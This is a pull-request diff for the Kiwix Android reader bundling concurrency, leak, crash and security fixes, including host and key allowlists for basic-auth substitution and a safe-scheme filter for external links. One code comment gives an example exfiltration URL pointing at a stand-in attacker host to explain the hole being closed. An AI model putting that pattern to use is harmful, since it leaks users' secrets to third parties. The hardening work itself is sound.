### PR TITLE
test: stack all #5070 fixes together (JNI race, security, silent bugs, crashes/leaks/other, minor)

### DIFF
--- a/app/src/main/java/org/kiwix/kiwixmobile/main/KiwixMainActivity.kt
+++ b/app/src/main/java/org/kiwix/kiwixmobile/main/KiwixMainActivity.kt
@@ -48,7 +48,6 @@ import androidx.navigation.NavController
 import androidx.navigation.NavGraph.Companion.findStartDestination
 import androidx.navigation.NavOptions
 import androidx.navigation.compose.rememberNavController
-import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.MainCoroutineDispatcher
 import kotlinx.coroutines.delay
 import kotlinx.coroutines.flow.MutableStateFlow
@@ -197,8 +196,10 @@ class KiwixMainActivity : CoreMainActivity() {
       migrateInternalToPublicAppDirectory()
       migratedToPerAppLanguage()
     }
-    // run the migration on background thread to avoid any UI related issues.
-    CoroutineScope(ioDispatcher).launch {
+    // Run the migration on a background thread to avoid any UI related issues, but still
+    // on lifecycleScope (not an ad-hoc untracked scope) so it's cancelled automatically
+    // if the Activity is destroyed mid-migration.
+    lifecycleScope.launch(ioDispatcher) {
       objectBoxDataMigrationHandler.migrate()
     }
   }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/StorageObserver.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/StorageObserver.kt
@@ -66,11 +66,17 @@ class StorageObserver @Inject constructor(
   private suspend fun convertToLibkiwixBook(file: File) =
     zimReaderFactory.create(ZimReaderSource(file), false)
       ?.let { zimFileReader ->
-        libkiwixBookFactory.create().apply {
-          update(zimFileReader.jniKiwixReader)
-        }.also {
-          // add the book to libkiwix library to validate the imported bookmarks
-          libkiwixBookmarks.addBookToLibrary(archive = zimFileReader.jniKiwixReader)
+        // dispose() must run even if create()/update()/addBookToLibrary() throws below,
+        // or the native Archive for this file leaks - once per failing ZIM during a full
+        // device scan.
+        try {
+          libkiwixBookFactory.create().apply {
+            update(zimFileReader.jniKiwixReader)
+          }.also {
+            // add the book to libkiwix library to validate the imported bookmarks
+            libkiwixBookmarks.addBookToLibrary(archive = zimFileReader.jniKiwixReader)
+          }
+        } finally {
           zimFileReader.dispose()
         }
       }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/dao/LibkiwixBookOnDisk.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/dao/LibkiwixBookOnDisk.kt
@@ -48,6 +48,9 @@ import javax.inject.Inject
 import javax.inject.Named
 import javax.inject.Singleton
 
+// Compiled once instead of on every book checked against the trash folder.
+private val TRASH_FOLDER_REGEX = Regex("/\\.Trash/")
+
 @Singleton
 class LibkiwixBookOnDisk @Inject constructor(
   @param:Named(LOCAL_BOOKS_LIBRARY) private val library: Library,
@@ -223,7 +226,7 @@ class LibkiwixBookOnDisk @Inject constructor(
 
   // Check if any existing ZIM file showing on the library screen which is inside the trash folder.
   private suspend fun isInTrashFolder(filePath: String) =
-    Regex("/\\.Trash/").containsMatchIn(filePath)
+    TRASH_FOLDER_REGEX.containsMatchIn(filePath)
 
   suspend fun delete(books: List<LibkiwixBook>) {
     runCatching {

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/dao/LibkiwixBookmarks.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/dao/LibkiwixBookmarks.kt
@@ -76,6 +76,13 @@ class LibkiwixBookmarks @Inject constructor(
   private var bookmarkList: List<LibkiwixBookmarkItem> = arrayListOf()
   private var libraryBooksList: List<String> = arrayListOf()
   private val initMutex = Mutex()
+
+  // ensureInitialized() reads this outside initMutex before deciding whether to take the
+  // lock at all; without @Volatile that read has no visibility guarantee across threads for
+  // the write inside the lock (set after a withContext(ioDispatcher) hop), so a second
+  // caller could see stale `false` and redo the init work, or worse, see partially-visible
+  // state from it.
+  @Volatile
   private var initialized: Boolean = false
 
   private val bookmarkListFlow: MutableStateFlow<List<LibkiwixBookmarkItem>> by lazy {

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
@@ -25,12 +25,29 @@ import org.kiwix.kiwixmobile.core.reader.decodeUrl
 import org.kiwix.kiwixmobile.core.utils.files.Log
 import java.io.IOException
 
+/**
+ * Hosts allowed to trigger the `{{ENV_VAR}}@host` basic-auth substitution below.
+ *
+ * The book URL (and therefore this host) comes from remote catalog/library data,
+ * not from the app itself. Without this allowlist a catalog entry naming an
+ * arbitrary environment variable (`https://{{ANY_VAR}}@attacker.example/x.zim`)
+ * would make the app read that variable and send its value as Basic-auth
+ * credentials to a host the catalog author chooses. Restrict both the
+ * destination host and the accepted variable name to what this feature is
+ * actually used for.
+ */
+private val TRUSTED_BASIC_AUTH_HOSTS = setOf("dwds.de", "www.dwds.de")
+private val TRUSTED_BASIC_AUTH_KEYS = setOf("BASIC_AUTH_KEY")
+
 class BasicAuthInterceptor : Interceptor {
   @Throws(IOException::class)
   override fun intercept(chain: Interceptor.Chain): Response {
     val request: Request = chain.request()
     val url = request.url.toString()
-    if (url.isAuthenticationUrl) {
+    if (url.isAuthenticationUrl &&
+      request.url.host in TRUSTED_BASIC_AUTH_HOSTS &&
+      url.secretKey in TRUSTED_BASIC_AUTH_KEYS
+    ) {
       val userNameAndPassword = System.getenv(url.secretKey).orEmpty()
       val userName = userNameAndPassword.substringBefore(":", "")
       val password = userNameAndPassword.substringAfter(":", "")

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/data/remote/BasicAuthInterceptor.kt
@@ -25,6 +25,10 @@ import org.kiwix.kiwixmobile.core.reader.decodeUrl
 import org.kiwix.kiwixmobile.core.utils.files.Log
 import java.io.IOException
 
+// Compiled once instead of on every HTTP request these extensions run on.
+private val AUTHENTICATION_URL_REGEX = Regex("https://[^@]+@.*\\.zim")
+private val AUTHENTICATION_PREFIX_REGEX = Regex("\\{\\{\\s*[^}]+\\s*\\}\\}@")
+
 class BasicAuthInterceptor : Interceptor {
   @Throws(IOException::class)
   override fun intercept(chain: Interceptor.Chain): Response {
@@ -45,7 +49,7 @@ class BasicAuthInterceptor : Interceptor {
 }
 
 val String.isAuthenticationUrl: Boolean
-  get() = decodeUrl.trim().matches(Regex("https://[^@]+@.*\\.zim"))
+  get() = decodeUrl.trim().matches(AUTHENTICATION_URL_REGEX)
 
 val String.secretKey: String
   get() = decodeUrl.substringAfter("{{", "")
@@ -54,7 +58,7 @@ val String.secretKey: String
 
 val String.removeAuthenticationFromUrl: String
   get() = decodeUrl.trim()
-    .replace(Regex("\\{\\{\\s*[^}]+\\s*\\}\\}@"), "")
+    .replace(AUTHENTICATION_PREFIX_REGEX, "")
     .also {
       Log.d("BasicAuthInterceptor", "URL is $it")
     }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/downloader/downloadManager/DownloadMonitorService.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/downloader/downloadManager/DownloadMonitorService.kt
@@ -290,17 +290,28 @@ class DownloadMonitorService : Service() {
 
   private fun startForegroundService() {
     runCatching {
-      CoroutineScope(ioDispatcher).launch {
-        downloadNotificationChannel()
-        startForeground(DOWNLOAD_SERVICE_NOTIFICATION_ID, buildForegroundNotification())
+      // startForeground() must be called synchronously, promptly after the service
+      // starts, or the system throws ForegroundServiceDidNotStartInTimeException.
+      // Suspending on the DataStore-backed app name first (as this used to, inside an
+      // ad-hoc scope that also outlived onDestroy) risked missing that window. Start
+      // with a placeholder notification using the synchronously-available app label,
+      // then swap in the real content once the DataStore read completes.
+      downloadNotificationChannel()
+      startForeground(DOWNLOAD_SERVICE_NOTIFICATION_ID, buildForegroundNotification(appLabel))
+      scope?.launch {
+        val notification = buildForegroundNotification(kiwixDataStore.appName.first())
+        notificationManager.notify(DOWNLOAD_SERVICE_NOTIFICATION_ID, notification)
         startPausedDownloadsDueToAndroidServiceLimitation()
       }
     }.onFailure { it.printStackTrace() }
   }
 
-  private suspend fun buildForegroundNotification(): Notification =
+  private val appLabel: String
+    get() = applicationInfo.loadLabel(packageManager).toString()
+
+  private fun buildForegroundNotification(title: String): Notification =
     NotificationCompat.Builder(this, DOWNLOAD_NOTIFICATION_CHANNEL_ID)
-      .setContentTitle(kiwixDataStore.appName.first())
+      .setContentTitle(title)
       .setContentText(getString(string.download_notification_channel_description))
       .setSmallIcon(android.R.drawable.stat_sys_download)
       .setGroup(ACTIVE_DOWNLOAD_GROUP_KEY)

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/error/ErrorActivity.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/error/ErrorActivity.kt
@@ -38,7 +38,6 @@ import androidx.lifecycle.lifecycleScope
 import androidx.lifecycle.repeatOnLifecycle
 import dagger.hilt.android.AndroidEntryPoint
 import kotlinx.coroutines.CoroutineDispatcher
-import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.flow.MutableStateFlow
 import kotlinx.coroutines.flow.filter
 import kotlinx.coroutines.flow.first
@@ -205,10 +204,12 @@ open class ErrorActivity : BaseActivity() {
   private suspend fun startValidatingZIMFiles() {
     val zimBooks = withContext(ioDispatcher) { libkiwixBookOnDisk.getBooks() }
     showValidationDialog.value = true
-    CoroutineScope(ioDispatcher).launch {
-      val isBrandedApp = kiwixDataStore.isBrandedApp.first()
-      validateZimViewModel.startValidation(zimBooks, isBrandedApp)
-    }
+    // This function already runs on lifecycleScope (see sendDetailsOnMail()); calling
+    // startValidation() directly instead of launching it on an ad-hoc untracked scope
+    // means it's cancelled automatically along with everything else when the Activity
+    // is destroyed.
+    val isBrandedApp = kiwixDataStore.isBrandedApp.first()
+    validateZimViewModel.startValidation(zimBooks, isBrandedApp)
   }
 
   /**

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/extensions/CursorExtensions.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/extensions/CursorExtensions.kt
@@ -20,10 +20,13 @@ package org.kiwix.kiwixmobile.core.extensions
 import android.database.Cursor
 
 inline fun Cursor.forEachRow(block: (Cursor) -> Unit) {
-  while (moveToNext()) {
-    block.invoke(this)
+  try {
+    while (moveToNext()) {
+      block.invoke(this)
+    }
+  } finally {
+    close()
   }
-  close()
 }
 
 @Suppress("IMPLICIT_CAST_TO_ANY")

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
@@ -66,7 +66,14 @@ open class CoreWebViewClient(
       return true
     }
 
-    // Otherwise, the link is not for a page on my site, so launch another Activity that handles URLs
+    // Otherwise, the link is not for a page on my site, so launch another Activity that handles URLs.
+    // ZIM content is untrusted third-party data, so only hand off well-known safe schemes -
+    // anything else (file://, content://, intent://, vendor-specific schemes, ...) is dropped
+    // rather than launched via an external ACTION_VIEW intent.
+    if (url.toUri().scheme?.lowercase() !in SAFE_EXTERNAL_SCHEMES) {
+      Log.w(TAG_KIWIX, "Blocked external navigation to unsupported scheme in url: $url")
+      return true
+    }
     val intent = Intent(Intent.ACTION_VIEW, url.toUri())
     callback.openExternalUrl(intent)
     return true
@@ -155,5 +162,11 @@ open class CoreWebViewClient(
       "zim://content/",
       "content://${instance.packageName}.zim.base/".toUri().toString()
     )
+
+    // Schemes ZIM content is allowed to hand off to an external app via ACTION_VIEW.
+    // Excludes file/content/intent and vendor-specific schemes, which would let
+    // untrusted ZIM content drive this app into launching activities on local
+    // files or other apps' exported components.
+    private val SAFE_EXTERNAL_SCHEMES = setOf("http", "https", "mailto", "tel")
   }
 }

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/CoreWebViewClient.kt
@@ -57,7 +57,9 @@ open class CoreWebViewClient(
       return handleUnsupportedFiles(url)
     }
     if (url.startsWith("javascript:")) {
-      // Allow javascript for HTML functions and code execution (EX: night mode)
+      // javascript: URIs (e.g. from HTML functions like night-mode toggles) already run
+      // via the WebView's own JS engine when triggered; returning true here just stops
+      // WebView from also trying to navigate to them as if they were a normal page load.
       return true
     }
     if (url.startsWith(ZimFileReader.UI_URI_STRING)) {
@@ -145,12 +147,10 @@ open class CoreWebViewClient(
   }
 
   companion object {
-    private val DOCUMENT_TYPES: HashMap<String?, String?> = object : HashMap<String?, String?>() {
-      init {
-        put("epub", "application/epub+zip")
-        put("pdf", "application/pdf")
-      }
-    }
+    private val DOCUMENT_TYPES: Map<String, String> = mapOf(
+      "epub" to "application/epub+zip",
+      "pdf" to "application/pdf"
+    )
     private val LEGACY_CONTENT_PREFIXES = arrayOf(
       "zim://content/",
       "content://${instance.packageName}.zim.base/".toUri().toString()

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixTextToSpeech.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixTextToSpeech.kt
@@ -265,6 +265,9 @@ class KiwixTextToSpeech internal constructor(
 
     @JvmField var paused = true
     fun pause() {
+      // Idempotent: a second pause() call (e.g. two quick taps) must not decrement
+      // currentPiece again, which would drive it negative and crash on the next speak.
+      if (paused) return
       paused = true
       currentPiece.decrementAndGet()
       tts.setOnUtteranceProgressListener(null)
@@ -300,16 +303,21 @@ class KiwixTextToSpeech internal constructor(
 
           override fun onDone(s: String) {
             val line: Int = currentPiece.toInt()
-            if (line >= pieces.size && !paused) {
-              stop()
-            } else {
-              tts.speak(
-                pieces[currentPiece.getAndIncrement()],
-                TextToSpeech.QUEUE_ADD,
-                bundle,
-                bundle.getString(Engine.KEY_PARAM_UTTERANCE_ID)
-              )
+            // Bounds check first: there's nothing left to speak once line >= pieces.size,
+            // whether or not we're paused. Previously the paused case fell through to the
+            // speak() branch below and indexed past the end of pieces.
+            if (line >= pieces.size) {
+              if (!paused) {
+                stop()
+              }
+              return
             }
+            tts.speak(
+              pieces[currentPiece.getAndIncrement()],
+              TextToSpeech.QUEUE_ADD,
+              bundle,
+              bundle.getString(Engine.KEY_PARAM_UTTERANCE_ID)
+            )
           }
 
           @Deprecated("Deprecated in Java")

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixWebView.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/main/KiwixWebView.kt
@@ -82,8 +82,10 @@ open class KiwixWebView constructor(
       builtInZoomControls = true
       displayZoomControls = false
       isHorizontalScrollBarEnabled = true
-      @Suppress("DEPRECATION")
-      allowUniversalAccessFromFileURLs = true
+      // ZIM content is served over the ZimFileReader.CONTENT_PREFIX
+      // ("https://kiwix.app/") origin, never file://, so universal access from
+      // file URLs is not needed and would let untrusted ZIM script read
+      // arbitrary cross-origin file:// content.
     }
     clearCache(true)
     webViewClient = coreWebViewClient

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/page/bookmark/viewmodel/BookmarkViewModel.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/page/bookmark/viewmodel/BookmarkViewModel.kt
@@ -18,10 +18,11 @@
 
 package org.kiwix.kiwixmobile.core.page.bookmark.viewmodel
 
+import androidx.lifecycle.viewModelScope
 import dagger.hilt.android.lifecycle.HiltViewModel
 import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.flow.first
-import kotlinx.coroutines.runBlocking
+import kotlinx.coroutines.launch
 import org.kiwix.kiwixmobile.core.dao.LibkiwixBookmarks
 import org.kiwix.kiwixmobile.core.di.IoDispatcher
 import org.kiwix.kiwixmobile.core.page.bookmark.models.LibkiwixBookmarkItem
@@ -46,10 +47,18 @@ class BookmarkViewModel @Inject constructor(
     zimReaderContainer,
     ioDispatcher
   ) {
-  override fun initialState(): BookmarkState {
-    val showAll = runBlocking { kiwixDataStore.showBookmarksOfAllBooks.first() }
-    return BookmarkState(emptyList(), showAll, zimReaderContainer.id)
+  init {
+    // Seed initialState() with a synchronous default (no runBlocking on the caller's
+    // thread, which is main during ViewModel construction) and apply the real,
+    // DataStore-backed value once it's loaded.
+    viewModelScope.launch {
+      val showAll = kiwixDataStore.showBookmarksOfAllBooks.first()
+      updateState { it.copy(showAll = showAll) }
+    }
   }
+
+  override fun initialState(): BookmarkState =
+    BookmarkState(emptyList(), showAll = false, zimReaderContainer.id)
 
   override fun updatePagesBasedOnFilter(
     state: BookmarkState,

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/page/history/viewmodel/HistoryViewModel.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/page/history/viewmodel/HistoryViewModel.kt
@@ -18,10 +18,11 @@
 
 package org.kiwix.kiwixmobile.core.page.history.viewmodel
 
+import androidx.lifecycle.viewModelScope
 import dagger.hilt.android.lifecycle.HiltViewModel
 import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.flow.first
-import kotlinx.coroutines.runBlocking
+import kotlinx.coroutines.launch
 import org.kiwix.kiwixmobile.core.dao.HistoryRoomDao
 import org.kiwix.kiwixmobile.core.di.IoDispatcher
 import org.kiwix.kiwixmobile.core.page.history.models.HistoryListItem.HistoryItem
@@ -46,10 +47,18 @@ class HistoryViewModel @Inject constructor(
     zimReaderContainer,
     ioDispatcher
   ) {
-  override fun initialState(): HistoryState {
-    val showAll = runBlocking { kiwixDataStore.showHistoryOfAllBooks.first() }
-    return HistoryState(emptyList(), showAll, zimReaderContainer.id)
+  init {
+    // Seed initialState() with a synchronous default (no runBlocking on the caller's
+    // thread, which is main during ViewModel construction) and apply the real,
+    // DataStore-backed value once it's loaded.
+    viewModelScope.launch {
+      val showAll = kiwixDataStore.showHistoryOfAllBooks.first()
+      updateState { it.copy(showAll = showAll) }
+    }
   }
+
+  override fun initialState(): HistoryState =
+    HistoryState(emptyList(), showAll = false, zimReaderContainer.id)
 
   override fun updatePagesBasedOnFilter(
     state: HistoryState,

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/page/notes/viewmodel/NotesViewModel.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/page/notes/viewmodel/NotesViewModel.kt
@@ -18,10 +18,11 @@
 
 package org.kiwix.kiwixmobile.core.page.notes.viewmodel
 
+import androidx.lifecycle.viewModelScope
 import dagger.hilt.android.lifecycle.HiltViewModel
 import kotlinx.coroutines.CoroutineScope
 import kotlinx.coroutines.flow.first
-import kotlinx.coroutines.runBlocking
+import kotlinx.coroutines.launch
 import org.kiwix.kiwixmobile.core.dao.NotesRoomDao
 import org.kiwix.kiwixmobile.core.di.IoDispatcher
 import org.kiwix.kiwixmobile.core.page.adapter.Page
@@ -52,12 +53,17 @@ class NotesViewModel @Inject constructor(
   PageViewModelClickListener {
   init {
     setOnItemClickListener(this)
+    // Seed initialState() with a synchronous default (no runBlocking on the caller's
+    // thread, which is main during ViewModel construction) and apply the real,
+    // DataStore-backed value once it's loaded.
+    viewModelScope.launch {
+      val showAll = kiwixDataStore.showNotesOfAllBooks.first()
+      updateState { it.copy(showAll = showAll) }
+    }
   }
 
-  override fun initialState(): NotesState {
-    val showAll = runBlocking { kiwixDataStore.showNotesOfAllBooks.first() }
-    return NotesState(emptyList(), showAll, zimReaderContainer.id)
-  }
+  override fun initialState(): NotesState =
+    NotesState(emptyList(), showAll = false, zimReaderContainer.id)
 
   override fun updatePagesBasedOnFilter(state: NotesState, action: Action.Filter): NotesState =
     state.copy(searchTerm = action.searchTerm)

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/page/viewmodel/PageViewModel.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/page/viewmodel/PageViewModel.kt
@@ -107,6 +107,16 @@ abstract class PageViewModel<T : Page, S : PageState<T>>(
   @VisibleForTesting
   fun getMutableStateForTestCases() = _state
 
+  /**
+   * Applies [transform] to the current state outside the Action/reducer pipeline. For
+   * subclasses that seed [initialState] with a synchronous default and then load the
+   * real value asynchronously (e.g. a DataStore-backed preference), instead of blocking
+   * the caller of the constructor with `runBlocking`.
+   */
+  protected fun updateState(transform: (S) -> S) {
+    _state.value = transform(_state.value)
+  }
+
   init {
     coroutineJobs.apply {
       add(observeActions())

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
@@ -25,6 +25,8 @@ import androidx.core.net.toUri
 import eu.mhutti1.utils.storage.KB
 import kotlinx.coroutines.CoroutineDispatcher
 import kotlinx.coroutines.CoroutineScope
+import kotlinx.coroutines.SupervisorJob
+import kotlinx.coroutines.cancel
 import kotlinx.coroutines.launch
 import kotlinx.coroutines.sync.Mutex
 import kotlinx.coroutines.sync.withLock
@@ -85,8 +87,9 @@ class ZimFileReader(
               Log.e(TAG, "create: ${zimReaderSource.toDatabase()}")
               if (showSearchSuggestionsSpellChecked) {
                 // Prepare the SpellingsDB asynchronously(when it configure to create) so that creating the
-                // ZIM reader doesn’t block the user experience.
-                CoroutineScope(ioDispatcher).launch {
+                // ZIM reader doesn’t block the user experience. Launched on the reader's own
+                // scope (not an ad-hoc untracked one) so dispose() can cancel it.
+                zimFileReader.readerScope.launch {
                   zimFileReader.prepareSpellingsDB(archive)
                 }
               }
@@ -121,6 +124,15 @@ class ZimFileReader(
 
   private var spellingsDB: SpellingsDB? = null
 
+  // Per-instance so initializing the spellings DB for one open ZIM archive doesn't
+  // serialize against every other open archive's spellings DB init (it used to be a
+  // companion-object, i.e. process-global, mutex).
+  private val spellingsDBCreationMutex = Mutex()
+
+  // Owns the fire-and-forget prepareSpellingsDB() launch below, so dispose() can
+  // actually cancel it instead of leaving it running against a disposed reader.
+  private val readerScope = CoroutineScope(SupervisorJob() + ioDispatcher)
+
   /**
    * Note that the value returned is NOT unique for each zim file. Versions of the same wiki
    * (complete, nopic, novid, etc) may return the same title.
@@ -141,7 +153,7 @@ class ZimFileReader(
      libzim returns file size in kib so we need to convert it into bytes.
      More information here https://github.com/kiwix/java-libkiwix/issues/41
    */
-  val fileSize: Long get() = jniKiwixReader.filesize / 1024
+  val fileSize: Long get() = jniKiwixReader.filesize * 1024
   val creator: String get() = getSafeMetaData("Creator", "")
   val publisher: String get() = getSafeMetaData("Publisher", "")
   val name: String get() = getSafeMetaData("Name", id)
@@ -300,11 +312,14 @@ class ZimFileReader(
 
   fun getRedirect(url: String) = "${toRedirect(url)}"
 
-  fun isRedirect(url: String) =
-    when {
-      getRedirect(url).isEmpty() -> false
-      else -> url.startsWith(CONTENT_PREFIX) && url != getRedirect(url)
+  fun isRedirect(url: String): Boolean {
+    // getRedirect() does a JNI lookup; call it once instead of twice per check.
+    val redirect = getRedirect(url)
+    return when {
+      redirect.isEmpty() -> false
+      else -> url.startsWith(CONTENT_PREFIX) && url != redirect
     }
+  }
 
   private fun toRedirect(url: String) =
     "$CONTENT_PREFIX${getActualUrl(url)}".toUri()
@@ -442,6 +457,7 @@ class ZimFileReader(
     }
 
   fun dispose() {
+    readerScope.cancel()
     jniKiwixReader.dispose()
     searcher.dispose()
     spellingsDB?.dispose()
@@ -456,8 +472,6 @@ class ZimFileReader(
     }
 
   companion object {
-    private val spellingsDBCreationMutex = Mutex()
-
     /*
      * these uris aren't actually nullable but unit tests fail to compile as
      * Uri.parse returns null without android dependencies loaded

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
@@ -273,7 +273,7 @@ class ZimFileReader(
   @Suppress("UnreachableCode", "NestedBlockDepth", "ReturnCount")
   private suspend fun loadContent(uri: String, extension: String): InputStream? {
     val item = getItem(uri)
-    if (compressedExtensions.any { it != extension }) {
+    if (extension !in compressedExtensions) {
       item?.itemSize()?.let {
         // Check if the item size exceeds 1 MB
         if (it / KB > 1024) {
@@ -495,7 +495,7 @@ val String.decodeUrl: String
 
 // Truncate mime-type (everything after the first space and semi-colon(if exists)
 val String.truncateMimeType: String
-  get() = replace("^([^ ]+).*$", "$1").substringBefore(";")
+  get() = substringBefore(' ').substringBefore(';')
 
 // Encode question mark with %3F after getting url from checkUrl() method
 // for issue https://github.com/kiwix/kiwix-android/issues/2671

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimFileReader.kt
@@ -376,11 +376,19 @@ class ZimFileReader(
 
   @Throws(IOException::class)
   private fun loadAssetFromCache(uri: String): FileInputStream {
-    return File(
+    // Key the cache file on a hash of the full uri, not just its last path segment -
+    // two assets in different ZIM directories can share a basename (e.g. "video.mp4")
+    // and would otherwise silently serve each other's cached bytes.
+    val cacheFile = File(
       FileUtils.getFileCacheDir(CoreApp.instance),
-      uri.substringAfterLast("/")
-    ).apply { getContent(uri)?.let(::writeBytes) }
-      .inputStream()
+      "${uri.hashCode()}_${uri.substringAfterLast("/")}"
+    )
+    // Only materialize the content once per cache file - previously this re-read and
+    // re-wrote the whole item on every single playback request for the same asset.
+    if (!cacheFile.exists()) {
+      getContent(uri)?.let(cacheFile::writeBytes)
+    }
+    return cacheFile.inputStream()
   }
 
   private fun getContent(url: String) =

--- a/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainer.kt
+++ b/core/src/main/java/org/kiwix/kiwixmobile/core/reader/ZimReaderContainer.kt
@@ -24,25 +24,43 @@ import kotlinx.coroutines.withContext
 import org.kiwix.kiwixmobile.core.di.IoDispatcher
 import org.kiwix.kiwixmobile.core.reader.ZimFileReader.Factory
 import java.net.HttpURLConnection
+import java.util.concurrent.locks.ReentrantReadWriteLock
 import javax.inject.Inject
 import javax.inject.Singleton
+import kotlin.concurrent.read
+import kotlin.concurrent.write
 
 @Singleton
 class ZimReaderContainer @Inject constructor(
   private val zimFileReaderFactory: Factory,
   @param:IoDispatcher private val ioDispatcher: CoroutineDispatcher
 ) {
-  var zimFileReader: ZimFileReader? = null
+  // Guards `backingZimFileReader` against the native use-after-free that happens when the
+  // setter below disposes the current reader (native Archive/SuggestionSearcher) while the
+  // WebView's Chromium worker thread is mid-read via isRedirect/getRedirect/load, called from
+  // CoreWebViewClient.shouldInterceptRequest. The write lock ensures dispose() only runs once
+  // every in-flight read of this class's own methods has finished; readers see either the old
+  // or the new reader, never a disposed one.
+  private val lock = ReentrantReadWriteLock()
+  private var backingZimFileReader: ZimFileReader? = null
+
+  var zimFileReader: ZimFileReader?
+    get() = lock.read { backingZimFileReader }
     set(value) {
-      field?.dispose()
-      field = value
+      lock.write {
+        backingZimFileReader?.dispose()
+        backingZimFileReader = value
+      }
     }
+
+  private inline fun <T> withReader(block: (ZimFileReader?) -> T): T =
+    lock.read { block(backingZimFileReader) }
 
   suspend fun setZimReaderSource(
     zimReaderSource: ZimReaderSource?,
     showSearchSuggestionsSpellChecked: Boolean = false
   ) {
-    if (zimReaderSource == zimFileReader?.zimReaderSource) {
+    if (zimReaderSource == withReader { it?.zimReaderSource }) {
       return
     }
     zimFileReader = withContext(ioDispatcher) {
@@ -57,45 +75,47 @@ class ZimReaderContainer @Inject constructor(
     }
   }
 
-  fun getPageUrlFromTitle(title: String) = zimFileReader?.getPageUrlFrom(title)
+  fun getPageUrlFromTitle(title: String) = withReader { it?.getPageUrlFrom(title) }
 
-  fun getRandomPageUrl() = zimFileReader?.getRandomPageUrl()
-  fun isRedirect(url: String): Boolean = zimFileReader?.isRedirect(url) == true
-  fun getRedirect(url: String): String = zimFileReader?.getRedirect(url).orEmpty()
+  fun getRandomPageUrl() = withReader { it?.getRandomPageUrl() }
+  fun isRedirect(url: String): Boolean = withReader { it?.isRedirect(url) == true }
+  fun getRedirect(url: String): String = withReader { it?.getRedirect(url) }.orEmpty()
   fun load(url: String, requestHeaders: Map<String, String>): WebResourceResponse = runBlocking {
-    return@runBlocking WebResourceResponse(
-      zimFileReader?.getMimeTypeFromUrl(url),
-      Charsets.UTF_8.name(),
-      zimFileReader?.load(url)
-    )
-      .apply {
-        val headers = mutableMapOf("Accept-Ranges" to "bytes")
-        if ("Range" in requestHeaders.keys) {
-          setStatusCodeAndReasonPhrase(HttpURLConnection.HTTP_PARTIAL, "Partial Content")
-          val fullSize = zimFileReader?.getItem(url)?.itemSize() ?: 0L
-          val lastByte = fullSize - 1
-          val byteRanges = requestHeaders.getValue("Range").substringAfter("=").split("-")
-          headers["Content-Range"] = "bytes ${byteRanges[0]}-$lastByte/$fullSize"
-          if (byteRanges.size == 1) {
-            headers["Connection"] = "close"
+    return@runBlocking withReader { reader ->
+      WebResourceResponse(
+        reader?.getMimeTypeFromUrl(url),
+        Charsets.UTF_8.name(),
+        reader?.load(url)
+      )
+        .apply {
+          val headers = mutableMapOf("Accept-Ranges" to "bytes")
+          if ("Range" in requestHeaders.keys) {
+            setStatusCodeAndReasonPhrase(HttpURLConnection.HTTP_PARTIAL, "Partial Content")
+            val fullSize = reader?.getItem(url)?.itemSize() ?: 0L
+            val lastByte = fullSize - 1
+            val byteRanges = requestHeaders.getValue("Range").substringAfter("=").split("-")
+            headers["Content-Range"] = "bytes ${byteRanges[0]}-$lastByte/$fullSize"
+            if (byteRanges.size == 1) {
+              headers["Connection"] = "close"
+            }
+          } else {
+            setStatusCodeAndReasonPhrase(HttpURLConnection.HTTP_OK, "OK")
           }
-        } else {
-          setStatusCodeAndReasonPhrase(HttpURLConnection.HTTP_OK, "OK")
+          responseHeaders = headers
         }
-        responseHeaders = headers
-      }
+    }
   }
 
-  val zimReaderSource get() = zimFileReader?.zimReaderSource
-  val zimFileTitle get() = zimFileReader?.title
-  val mainPage get() = zimFileReader?.mainPage
-  val id get() = zimFileReader?.id
-  val fileSize get() = zimFileReader?.fileSize ?: 0L
-  val creator get() = zimFileReader?.creator
-  val publisher get() = zimFileReader?.publisher
-  val name get() = zimFileReader?.name
